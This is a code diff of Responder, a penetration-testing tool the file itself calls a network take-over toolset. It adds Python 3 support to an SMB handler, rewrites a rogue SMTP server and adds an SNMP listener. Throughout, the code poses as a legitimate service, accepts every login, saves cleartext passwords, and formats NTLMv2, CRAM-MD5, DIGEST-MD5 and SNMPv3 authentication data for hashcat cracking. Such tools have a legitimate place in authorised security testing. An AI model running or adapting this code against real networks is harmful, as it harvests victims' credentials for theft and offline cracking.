-					data = self.request.recv(1024)
-
-				if data[8:10] == "\xa2\x00" and data[4:5] == "\xff":  #NT_CREATE Access Denied.
-					Header = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x00\x00\x00"
-
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-
-					self.request.send(Buffer)
-					data = self.request.recv(1024)
-
-				if data[8:10] == "\x25\x00" and data[4:5] == "\xff":  # Trans2 Access Denied.
-					Header = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x00\x00\x00"
-
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-
-					self.request.send(Buffer)
-					data = self.request.recv(1024)
-				
-
-				if data[8:10] == "\x74\x00" and data[4:5] == "\xff":  # LogOff
-					Header = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x02\xff\x00\x27\x00\x00\x00"
-
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-
-					self.request.send(Buffer)
-					data = self.request.recv(1024)
-
-		except socket.error:
+		except:
 			pass
 
 
 class SMB1LM(BaseRequestHandler):  # SMB Server class, old version
 	def handle(self):
 		try:
-			self.request.settimeout(0.5)
+			self.request.settimeout(1)
 			data = self.request.recv(1024)
-
-			if data[0] == "\x81":  #session request 139
+			Challenge = RandomChallenge()
+			if data[0:1] == b"\x81":  #session request 139
 				Buffer = "\x82\x00\x00\x00"
-				self.request.send(Buffer)
+				self.request.send(NetworkSendBufferPython2or3(Buffer))
 				data = self.request.recv(1024)
 
-			if data[8:10] == "\x72\x00":  #Negotiate proto answer.
-				head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
-				Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=settings.Config.Challenge)
+			if data[8:10] == b"\x72\x00":  #Negotiate proto answer.
+				head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
+				Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)),Domain="",Key=NetworkRecvBufferPython2or3(Challenge))
 				Body.calculate()
 				Packet = str(head)+str(Body)
-				Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-				self.request.send(Buffer)
+				Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
+				self.request.send(NetworkSendBufferPython2or3(Buffer))
 				data = self.request.recv(1024)
 
-			if data[8:10] == "\x73\x00":  #Session Setup AndX Request
+			if data[8:10] == b"\x73\x00":  #Session Setup AndX Request
 				if Is_LMNT_Anonymous(data):
-					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
 					Packet = str(head)+str(SMBSessEmpty())
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-					self.request.send(Buffer)
+					Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 				else:
-					ParseLMNTHash(data,self.client_address[0])
-					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+					ParseLMNTHash(data,self.client_address[0], Challenge)
+					if settings.Config.ErrorCode:
+						ntstatus="\x6d\x00\x00\xc0"
+					else:
+						ntstatus="\x22\x00\x00\xc0"
+					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode=ntstatus,pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
 					Packet = str(head) + str(SMBSessEmpty())
-					Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
-					self.request.send(Buffer)
+					Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					data = self.request.recv(1024)
 		except Exception:
 			self.request.close()

servers/SMTP.py

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
+# email: lgaffie@secorizon.com
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
 # the Free Software Foundation, either version 3 of the License, or
@@ -15,48 +15,632 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from utils import *
-from base64 import b64decode
-from SocketServer import BaseRequestHandler
+from base64 import b64decode, b64encode
+import hashlib
+import codecs
+import struct
+import re
+import ssl
+import os
+
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 from packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2
 
 class ESMTP(BaseRequestHandler):
-
+	"""SMTP server with multiple authentication methods and STARTTLS"""
+	
+	def __init__(self, *args, **kwargs):
+		self.challenge = None
+		BaseRequestHandler.__init__(self, *args, **kwargs)
+	
+	def send_response(self, code, message):
+		"""Send SMTP response"""
+		response = "%d %s\r\n" % (code, message)
+		self.request.send(response.encode('latin-1'))
+	
+	def send_multiline_response(self, code, lines):
+		"""Send multi-line SMTP response"""
+		for i, line in enumerate(lines):
+			if i < len(lines) - 1:
+				response = "%d-%s\r\n" % (code, line)
+			else:
+				response = "%d %s\r\n" % (code, line)
+			self.request.send(response.encode('latin-1'))
+	
+	def send_continue(self, data=""):
+		"""Send continuation response for AUTH"""
+		if data:
+			response = "334 %s\r\n" % data
+		else:
+			response = "334\r\n"
+		self.request.send(response.encode('latin-1'))
+	
+	def upgrade_to_tls(self):
+		"""Upgrade connection to TLS using Responder's SSL certificates"""
+		try:
+			# Get SSL certificate paths from Responder config
+			cert_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
+			key_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
+			
+			if not os.path.exists(cert_path) or not os.path.exists(key_path):
+				if settings.Config.Verbose:
+					print(text('[SMTP] SSL certificates not found'))
+				return False
+			
+			# Create SSL context
+			context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+			context.load_cert_chain(cert_path, key_path)
+			
+			# Wrap socket
+			self.request = context.wrap_socket(self.request, server_side=True)
+			
+			if settings.Config.Verbose:
+				print(text('[SMTP] Successfully upgraded to TLS from %s' % 
+					self.client_address[0].replace("::ffff:", "")))
+			
+			return True
+			
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[SMTP] TLS upgrade failed: %s' % str(e)))
+			return False
+	
+	def handle_auth_plain(self, data):
+		"""Handle AUTH PLAIN"""
+		try:
+			# AUTH PLAIN can be:
+			# AUTH PLAIN <base64>
+			# or
+			# AUTH PLAIN
+			# <base64>
+			
+			auth_match = re.search(b'AUTH PLAIN (.+)', data, re.IGNORECASE)
+			
+			if auth_match:
+				# Inline format
+				auth_data = auth_match.group(1).strip()
+			else:
+				# Need to read next line
+				self.send_continue()
+				auth_data = self.request.recv(1024).strip()
+			
+			if not auth_data or auth_data == b'*':
+				return False
+			
+			# Decode
+			decoded = b64decode(auth_data)
+			# Format: [authzid]\x00username\x00password
+			parts = decoded.split(b'\x00')
+			
+			if len(parts) >= 3:
+				username = parts[1].decode('latin-1', errors='ignore')
+				password = parts[2].decode('latin-1', errors='ignore')
+			elif len(parts) == 2:
+				username = parts[0].decode('latin-1', errors='ignore')
+				password = parts[1].decode('latin-1', errors='ignore')
+			else:
+				return False
+			
+			SaveToDb({
+				'module': 'SMTP',
+				'type': 'AUTH-PLAIN',
+				'client': self.client_address[0],
+				'user': username,
+				'cleartext': password,
+				'fullhash': username + ":" + password,
+			})
+			
+			if settings.Config.Verbose:
+				print(color("[*] [SMTP] Captured AUTH PLAIN credentials from %s for user %s" % (
+					self.client_address[0].replace("::ffff:", ""), username), 2, 1))
+			
+			return True
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[SMTP] Error parsing AUTH PLAIN: %s' % str(e)))
+			return False
+	
+	def handle_auth_login(self, data):
+		"""Handle AUTH LOGIN (two-stage)"""
+		try:
+			# Check if username is inline
+			auth_match = re.search(b'AUTH LOGIN (.+)', data, re.IGNORECASE)
+			
+			if auth_match:
+				# Username provided inline
+				username_b64 = auth_match.group(1).strip()
+				username = b64decode(username_b64).decode('latin-1', errors='ignore')
+			else:
+				# Prompt for username
+				self.send_continue(b64encode(b"Username:").decode('latin-1'))
+				username_b64 = self.request.recv(1024).strip()
+				
+				if not username_b64 or username_b64 == b'*':
+					return False
+				
+				username = b64decode(username_b64).decode('latin-1', errors='ignore')
+			
+			# Prompt for password
+			self.send_continue(b64encode(b"Password:").decode('latin-1'))
+			password_b64 = self.request.recv(1024).strip()
+			
+			if not password_b64 or password_b64 == b'*':
+				return False
+			
+			password = b64decode(password_b64).decode('latin-1', errors='ignore')
+			
+			SaveToDb({
+				'module': 'SMTP',
+				'type': 'AUTH-LOGIN',
+				'client': self.client_address[0],
+				'user': username,
+				'cleartext': password,
+				'fullhash': username + ":" + password,
+			})
+			
+			if settings.Config.Verbose:
+				print(color("[*] [SMTP] Captured AUTH LOGIN credentials from %s for user %s" % (
+					self.client_address[0].replace("::ffff:", ""), username), 2, 1))
+			
+			return True
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[SMTP] Error parsing AUTH LOGIN: %s' % str(e)))
+			return False
+	
+	def handle_auth_cram_md5(self, data):
+		"""Handle AUTH CRAM-MD5 (challenge-response)"""
+		try:
+			import time
+			import os
+			
+			# Generate challenge
+			challenge = "<%d.%d@%s>" % (os.getpid(), int(time.time()), settings.Config.MachineName)
+			challenge_b64 = b64encode(challenge.encode('latin-1')).decode('latin-1')
+			
+			# Send challenge
+			self.send_continue(challenge_b64)
+			
+			# Receive response
+			response_b64 = self.request.recv(1024).strip()
+			
+			if not response_b64 or response_b64 == b'*':
+				return False
+			
+			response = b64decode(response_b64).decode('latin-1', errors='ignore')
+			# Format: username<space>digest
+			parts = response.split(' ', 1)
+			
+			if len(parts) < 2:
+				return False
+			
+			username = parts[0]
+			digest = parts[1].lower()
+			
+			# Format for hashcat
+			hash_string = "%s:$cram_md5$%s$%s" % (username, challenge, digest)
+			
+			SaveToDb({
+				'module': 'SMTP',
+				'type': 'CRAM-MD5',
+				'client': self.client_address[0],
+				'user': username,
+				'hash': digest,
+				'fullhash': hash_string,
+			})
+			
+			if settings.Config.Verbose:
+				print(color("[*] [SMTP] Captured CRAM-MD5 hash from %s for user %s" % (
+					self.client_address[0].replace("::ffff:", ""), username), 3, 1))
+			
+			return True
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[SMTP] Error parsing CRAM-MD5: %s' % str(e)))
+			return False
+	
+	def handle_auth_digest_md5(self, data):
+		"""Handle AUTH DIGEST-MD5"""
+		try:
+			import time
+			import os
+			
+			# Generate nonce
+			nonce = hashlib.md5(str(time.time()).encode()).hexdigest()
+			
+			# Build challenge
+			challenge_parts = [
+				'realm="%s"' % settings.Config.MachineName,
+				'nonce="%s"' % nonce,
+				'qop="auth"',
+				'charset=utf-8',
+				'algorithm=md5-sess'
+			]
+			challenge = ','.join(challenge_parts)
+			challenge_b64 = b64encode(challenge.encode('latin-1')).decode('latin-1')
+			
+			# Send challenge
+			self.send_continue(challenge_b64)
+			
+			# Receive response
+			response_b64 = self.request.recv(1024).strip()
+			
+			if not response_b64 or response_b64 == b'*':
+				return False
+			
+			response = b64decode(response_b64).decode('latin-1', errors='ignore')
+			
+			# Parse response
+			username_match = re.search(r'username="([^"]+)"', response)
+			realm_match = re.search(r'realm="([^"]+)"', response)
+			nonce_match = re.search(r'nonce="([^"]+)"', response)
+			cnonce_match = re.search(r'cnonce="([^"]+)"', response)
+			nc_match = re.search(r'nc=([0-9a-fA-F]+)', response)
+			qop_match = re.search(r'qop=([a-z\-]+)', response)
+			uri_match = re.search(r'digest-uri="([^"]+)"', response)
+			response_match = re.search(r'response=([0-9a-fA-F]+)', response)
+			
+			if not username_match or not response_match:
+				return False
+			
+			username = username_match.group(1)
+			realm = realm_match.group(1) if realm_match else ''
+			resp_nonce = nonce_match.group(1) if nonce_match else ''
+			cnonce = cnonce_match.group(1) if cnonce_match else ''
+			nc = nc_match.group(1) if nc_match else ''
+			qop = qop_match.group(1) if qop_match else ''
+			uri = uri_match.group(1) if uri_match else ''
+			resp_hash = response_match.group(1)
+			
+			# Format for hashcat/john
+			hash_string = "%s:$sasl$DIGEST-MD5$%s$%s$%s$%s$%s$%s$%s" % (
+				username, realm, nonce, cnonce, nc, qop, uri, resp_hash
+			)
+			
+			SaveToDb({
+				'module': 'SMTP',
+				'type': 'DIGEST-MD5',
+				'client': self.client_address[0],
+				'user': username,
+				'hash': resp_hash,
+				'fullhash': hash_string,
+			})
+			
+			if settings.Config.Verbose:
+				print(color("[*] [SMTP] Captured DIGEST-MD5 hash from %s for user %s" % (
+					self.client_address[0].replace("::ffff:", ""), username), 3, 1))
+			
+			# Send rspauth (expected by some clients)
+			rspauth = 'rspauth=' + resp_hash
+			self.send_continue(b64encode(rspauth.encode('latin-1')).decode('latin-1'))
+			
+			# Client should send empty line
+			self.request.recv(1024)
+			
+			return True
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[SMTP] Error parsing DIGEST-MD5: %s' % str(e)))
+			return False
+	
+	def handle_auth_ntlm(self, data):
+		"""Handle AUTH NTLM with proper Type 2 challenge"""
+		try:
+			import time
+			
+			# Check for inline NTLM NEGOTIATE
+			auth_match = re.search(b'AUTH NTLM (.+)', data, re.IGNORECASE)
+			
+			if auth_match:
+				negotiate_b64 = auth_match.group(1).strip()
+			else:
+				# Send empty continuation
+				self.send_continue()
+				negotiate_b64 = self.request.recv(1024).strip()
+			
+			if not negotiate_b64 or negotiate_b64 == b'*':
+				return False
+			
+			negotiate = b64decode(negotiate_b64)
+			
+			# Verify NTLMSSP signature
+			if negotiate[0:8] != b'NTLMSSP\x00':
+				return False
+			
+			msg_type = struct.unpack('<I', negotiate[8:12])[0]
+			if msg_type != 1:  # Type 1 - NEGOTIATE
+				return False
+			
+			# Generate Type 2 with proper structure
+			type2_msg = self.generate_ntlm_type2()
+			challenge_b64 = b64encode(type2_msg).decode('latin-1')
+			
+			# Send challenge
+			self.send_continue(challenge_b64)
+			
+			# Receive NTLMSSP AUTH (Type 3)
+			auth_b64 = self.request.recv(2048).strip()
+			
+			if not auth_b64 or auth_b64 == b'*':
+				return False
+			
+			auth_data = b64decode(auth_b64)
+			
+			# Parse Type 3 and extract hash
+			ntlm_hash = self.parse_ntlm_type3(auth_data, type2_msg)
+			
+			if ntlm_hash:
+				# Extract username from hash for logging
+				username = ntlm_hash.split('::')[0]
+				
+				SaveToDb({
+					'module': 'SMTP',
+					'type': 'NTLMv2-SSP',
+					'client': self.client_address[0],
+					'user': username,
+					'hash': ntlm_hash,
+					'fullhash': ntlm_hash,
+				})
+				
+				if settings.Config.Verbose:
+					print(color("[*] [SMTP] Captured NTLMv2 hash from %s for user %s" % (
+						self.client_address[0].replace("::ffff:", ""), username), 3, 1))
+				
+				return True
+			
+			return False
+			
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[SMTP] Error parsing NTLM: %s' % str(e)))
+			return False
+	
+	def generate_ntlm_type2(self):
+		"""Generate NTLM Type 2 with target info for NTLMv2"""
+		import time
+		
+		# Generate random 8-byte challenge
+		challenge = RandomChallenge()
+		
+		# Target name: "WORKGROUP" (18 bytes in UTF-16LE)
+		target_name = b'WORKGROUP'.decode('ascii').encode('utf-16le')
+		target_name_len = len(target_name)
+		
+		# Build target info (AV pairs) for NTLMv2
+		target_info = b''
+		
+		# MsvAvNbDomainName (0x0002)
+		av_domain = b'WORKGROUP'.decode('ascii').encode('utf-16le')
+		target_info += struct.pack('<HH', 0x0002, len(av_domain)) + av_domain
+		
+		# MsvAvNbComputerName (0x0001)
+		av_computer = b'SERVER'.decode('ascii').encode('utf-16le')
+		target_info += struct.pack('<HH', 0x0001, len(av_computer)) + av_computer
+		
+		# MsvAvDnsDomainName (0x0004)
+		av_dns_domain = b'workgroup'.decode('ascii').encode('utf-16le')
+		target_info += struct.pack('<HH', 0x0004, len(av_dns_domain)) + av_dns_domain
+		
+		# MsvAvDnsComputerName (0x0003)
+		av_dns_computer = b'server'.decode('ascii').encode('utf-16le')
+		target_info += struct.pack('<HH', 0x0003, len(av_dns_computer)) + av_dns_computer
+		
+		# MsvAvTimestamp (0x0007) - 8 bytes FILETIME
+		filetime = int((time.time() + 11644473600) * 10000000)
+		target_info += struct.pack('<HH', 0x0007, 8) + struct.pack('<Q', filetime)
+		
+		# MsvAvEOL (0x0000)
+		target_info += struct.pack('<HH', 0x0000, 0)
+		
+		target_info_len = len(target_info)
+		
+		# Calculate offsets
+		target_name_offset = 48
+		target_info_offset = target_name_offset + target_name_len
+		
+		# Build Type 2 message
+		type2_msg = b'NTLMSSP\x00'  # Signature
+		type2_msg += struct.pack('<I', 2)  # Type 2
+		
+		# Target name (LE format: len, max len, offset)
+		type2_msg += struct.pack('<HHI', target_name_len, target_name_len, target_name_offset)
+		
+		# Flags - use HTTP server flags for compatibility
+		type2_msg += b'\x05\x02\x81\xa2'  # 0xa2810205
+		
+		# Challenge (8 bytes)
+		type2_msg += challenge
+		
+		# Context (8 bytes, reserved)
+		type2_msg += b'\x00' * 8
+		
+		# Target info (LE format: len, max len, offset)
+		type2_msg += struct.pack('<HHI', target_info_len, target_info_len, target_info_offset)
+		
+		# Payload
+		type2_msg += target_name
+		type2_msg += target_info
+		
+		return type2_msg
+	
+	def parse_ntlm_type3(self, type3_msg, type2_msg):
+		"""Parse Type 3 and extract NetNTLMv2 hash"""
+		try:
+			# Verify signature
+			if type3_msg[:8] != b'NTLMSSP\x00':
+				return None
+			
+			# Verify message type
+			msg_type = struct.unpack('<I', type3_msg[8:12])[0]
+			if msg_type != 3:
+				return None
+			
+			# Parse security buffers
+			# LM Response
+			lm_len, lm_maxlen, lm_offset = struct.unpack('<HHI', type3_msg[12:20])
+			
+			# NTLM Response
+			ntlm_len, ntlm_maxlen, ntlm_offset = struct.unpack('<HHI', type3_msg[20:28])
+			
+			# Domain name
+			domain_len, domain_maxlen, domain_offset = struct.unpack('<HHI', type3_msg[28:36])
+			
+			# User name
+			user_len, user_maxlen, user_offset = struct.unpack('<HHI', type3_msg[36:44])
+			
+			# Workstation name
+			ws_len, ws_maxlen, ws_offset = struct.unpack('<HHI', type3_msg[44:52])
+			
+			# Extract strings
+			if user_offset + user_len <= len(type3_msg):
+				user = type3_msg[user_offset:user_offset+user_len].decode('utf-16le', errors='ignore')
+			else:
+				user = ""
+			
+			if domain_offset + domain_len <= len(type3_msg):
+				domain = type3_msg[domain_offset:domain_offset+domain_len].decode('utf-16le', errors='ignore')
+			else:
+				domain = ""
+			
+			# DO NOT parse email addresses - use exact Type 3 fields for hashcat
+			
+			if ws_offset + ws_len <= len(type3_msg):
+				workstation = type3_msg[ws_offset:ws_offset+ws_len].decode('utf-16le', errors='ignore')
+			else:
+				workstation = ""
+			
+			# Extract NTLM response
+			if ntlm_offset + ntlm_len <= len(type3_msg):
+				ntlm_response = type3_msg[ntlm_offset:ntlm_offset+ntlm_len]
+			else:
+				return None
+			
+			# Check if NTLMv2 (response length > 24 bytes)
+			if len(ntlm_response) > 24:
+				# NTLMv2
+				ntlmv2_response = ntlm_response[:16]  # First 16 bytes
+				ntlmv2_blob = ntlm_response[16:]      # Rest is the blob
+				
+				# Extract challenge from Type 2
+				challenge = type2_msg[24:32]  # Challenge is at offset 24
+				
+				# Build hashcat NetNTLMv2 format
+				# Format: username::domain:challenge:ntlmv2_response:blob
+				# For hashcat mode 5600
+				hash_str = "%s::%s:%s:%s:%s" % (
+					user,
+					domain,
+					codecs.encode(challenge, 'hex').decode('latin-1'),
+					codecs.encode(ntlmv2_response, 'hex').decode('latin-1'),
+					codecs.encode(ntlmv2_blob, 'hex').decode('latin-1')
+				)
+				
+				return hash_str
+			
+			# NTLMv1 or unsupported
+			return None
+			
+		except Exception as e:
+			return None
+	
 	def handle(self):
 		try:
-			self.request.send(str(SMTPGreeting()))
+			# Send greeting
+			self.request.send(NetworkSendBufferPython2or3(SMTPGreeting()))
 			data = self.request.recv(1024)
-
-			if data[0:4] == "EHLO":
-				self.request.send(str(SMTPAUTH()))
-				data = self.request.recv(1024)
-
-			if data[0:4] == "AUTH":
-				self.request.send(str(SMTPAUTH1()))
+			
+			# Handle EHLO
+			if data[0:4].upper() == b'EHLO' or data[0:4].upper() == b'HELO':
+				# Send ESMTP capabilities
+				capabilities = [
+					settings.Config.MachineName + " Hello",
+					"STARTTLS",
+					"AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 NTLM",
+					"SIZE 35651584",
+					"8BITMIME",
+					"PIPELINING",
+					"ENHANCEDSTATUSCODES"
+				]
+				self.send_multiline_response(250, capabilities)
 				data = self.request.recv(1024)
+			
+			# Handle STARTTLS command
+			if data[0:8].upper() == b'STARTTLS':
+				self.send_response(220, "Ready to start TLS")
 				
-				if data:
-					try:
-						User = filter(None, b64decode(data).split('\x00'))
-						Username = User[0]
-						Password = User[1]
-					except:
-						Username = b64decode(data)
-
-						self.request.send(str(SMTPAUTH2()))
+				# Upgrade to TLS
+				if self.upgrade_to_tls():
+					# After successful TLS upgrade, client will send EHLO again
+					data = self.request.recv(1024)
+					
+					# Handle EHLO after STARTTLS
+					if data[0:4].upper() == b'EHLO' or data[0:4].upper() == b'HELO':
+						# Send capabilities again (without STARTTLS this time)
+						capabilities = [
+							settings.Config.MachineName + " Hello",
+							"AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 NTLM",
+							"SIZE 35651584",
+							"8BITMIME",
+							"PIPELINING",
+							"ENHANCEDSTATUSCODES"
+						]
+						self.send_multiline_response(250, capabilities)
 						data = self.request.recv(1024)
-
-						if data:
-							try: Password = b64decode(data)
-							except: Password = data
-
-					SaveToDb({
-						'module': 'SMTP', 
-						'type': 'Cleartext', 
-						'client': self.client_address[0], 
-						'user': Username, 
-						'cleartext': Password, 
-						'fullhash': Username+":"+Password,
-					})
-
-		except Exception:
+				else:
+					# TLS upgrade failed
+					self.send_response(454, "TLS not available")
+					return
+			
+			# Handle AUTH command
+			if data[0:4].upper() == b'AUTH':
+				mechanism = data[5:].strip().split(b' ')[0].upper()
+				
+				if mechanism == b'PLAIN':
+					if self.handle_auth_plain(data):
+						self.send_response(235, "Authentication successful")
+					else:
+						self.send_response(535, "Authentication failed")
+					return
+				
+				elif mechanism == b'LOGIN':
+					if self.handle_auth_login(data):
+						self.send_response(235, "Authentication successful")
+					else:
+						self.send_response(535, "Authentication failed")
+					return
+				
+				elif mechanism == b'CRAM-MD5' or mechanism.startswith(b'CRAM'):
+					if self.handle_auth_cram_md5(data):
+						self.send_response(235, "Authentication successful")
+					else:
+						self.send_response(535, "Authentication failed")
+					return
+				
+				elif mechanism == b'DIGEST-MD5' or mechanism.startswith(b'DIGEST'):
+					if self.handle_auth_digest_md5(data):
+						self.send_response(235, "Authentication successful")
+					else:
+						self.send_response(535, "Authentication failed")
+					return
+				
+				elif mechanism == b'NTLM':
+					if self.handle_auth_ntlm(data):
+						self.send_response(235, "Authentication successful")
+					else:
+						self.send_response(535, "Authentication failed")
+					return
+				
+				else:
+					self.send_response(504, "Unrecognized authentication type")
+					return
+			
+			# Handle other commands
+			self.send_response(250, "OK")
+			
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[SMTP] Exception: %s' % str(e)))
 			pass

servers/SNMP.py

@@ -0,0 +1,391 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: lgaffie@secorizon.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+from utils import *
+from binascii import hexlify, unhexlify
+import struct
+
+try:
+    from pyasn1.codec.ber.decoder import decode
+    from pyasn1.codec.ber.encoder import encode
+    HAS_PYASN1 = True
+except ImportError:
+    HAS_PYASN1 = False
+    if settings.Config.Verbose:
+        print(text('[SNMP] Warning: pyasn1 not installed, SNMP server disabled'))
+
+if settings.Config.PY2OR3 == "PY3":
+    from socketserver import BaseRequestHandler
+else:
+    from SocketServer import BaseRequestHandler
+
+# SNMPv3 Authentication Algorithms
+SNMPV3_AUTH_ALGORITHMS = {
+    b'\x06\x0c\x2b\x06\x01\x06\x03\x0f\x01\x01\x04\x00': ('usmNoAuthProtocol', None),
+    b'\x06\x0a\x2b\x06\x01\x06\x03\x0a\x01\x01\x02': ('usmHMACMD5AuthProtocol', 25100),
+    b'\x06\x0a\x2b\x06\x01\x06\x03\x0a\x01\x01\x03': ('usmHMACSHAAuthProtocol', 25200),
+    b'\x06\x09\x2b\x06\x01\x06\x03\x0a\x01\x01\x04': ('usmHMAC128SHA224AuthProtocol', 25300),
+    b'\x06\x09\x2b\x06\x01\x06\x03\x0a\x01\x01\x05': ('usmHMAC192SHA256AuthProtocol', 25400),
+    b'\x06\x09\x2b\x06\x01\x06\x03\x0a\x01\x01\x06': ('usmHMAC256SHA384AuthProtocol', 25500),
+    b'\x06\x09\x2b\x06\x01\x06\x03\x0a\x01\x01\x07': ('usmHMAC384SHA512AuthProtocol', 25600),
+}
+
+class SNMP(BaseRequestHandler):
+    def handle(self):
+        if not HAS_PYASN1:
+            return
+        
+        try:
+            data = self.request[0]
+            socket = self.request[1]
+            
+            # Decode the SNMP message
+            try:
+                received_record, rest_of_substrate = decode(data)
+            except Exception as e:
+                if settings.Config.Verbose:
+                    print(text('[SNMP] ASN.1 decode error: %s' % str(e)))
+                return
+            
+            # Get SNMP version
+            try:
+                snmp_version = int(received_record['field-0'])
+            except:
+                if settings.Config.Verbose:
+                    print(text('[SNMP] Could not determine SNMP version'))
+                return
+            
+            # Handle SNMPv3
+            if snmp_version == 3:
+                self.handle_snmpv3(data, received_record, socket)
+            # Handle SNMPv1/v2c
+            else:
+                self.handle_snmpv1v2c(data, received_record, snmp_version, socket)
+        
+        except Exception as e:
+            if settings.Config.Verbose:
+                print(text('[SNMP] Exception in handler: %s' % str(e)))
+            pass
+    
+    def handle_snmpv3(self, data, received_record, socket):
+        """Handle SNMPv3 messages and extract authentication parameters"""
+        try:
+            # Decode the inner security parameters
+            received_record_inner, _ = decode(received_record['field-2'])
+            
+            # Extract fields
+            snmp_user = str(received_record_inner['field-3'])
+            engine_id = hexlify(received_record_inner['field-0']._value).decode('utf-8')
+            engine_boots = int(received_record_inner['field-1'])
+            engine_time = int(received_record_inner['field-2'])
+            auth_params = hexlify(received_record_inner['field-4']._value).decode('utf-8')
+            priv_params = hexlify(received_record_inner['field-5']._value).decode('utf-8')
+            
+            # Zero out authentication parameters in packet for hashcat
+            # Hashcat recalculates HMAC over packet with auth params = zeros
+            data_hex = hexlify(data).decode('utf-8')
+            if auth_params and auth_params != '00' * 12:
+                # Replace auth params with zeros in the packet
+                zeroed_auth = '00' * (len(auth_params) // 2)
+                full_snmp_msg = data_hex.replace(auth_params, zeroed_auth)
+            else:
+                full_snmp_msg = data_hex
+            
+            # Determine authentication algorithm
+            auth_algo_name, hashcat_mode = self.identify_auth_algorithm(data)
+            
+            # If not detected by OID, infer from auth params length
+            if not hashcat_mode and auth_params and auth_params != '00' * 12:
+                auth_len = len(auth_params) // 2  # Convert hex to bytes
+                if auth_len == 12:
+                    # Could be MD5 or SHA1 - use combined mode
+                    auth_algo_name = 'HMAC-MD5-96/HMAC-SHA1-96'
+                    hashcat_mode = 25000
+                elif auth_len == 16:
+                    auth_algo_name = 'HMAC-SHA224'
+                    hashcat_mode = 25300
+                elif auth_len == 24:
+                    auth_algo_name = 'HMAC-SHA256'
+                    hashcat_mode = 25400
+                elif auth_len == 32:
+                    auth_algo_name = 'HMAC-SHA384'
+                    hashcat_mode = 25500
+                elif auth_len == 48:
+                    auth_algo_name = 'HMAC-SHA512'
+                    hashcat_mode = 25600
+            
+            # Check if this is a discovery request (no auth params and empty username)
+            if (not auth_params or auth_params == '00' * 12) and (not snmp_user or snmp_user == ''):
+                # Send discovery response with our engine ID
+                self.send_discovery_response(socket, received_record)
+                return
+            
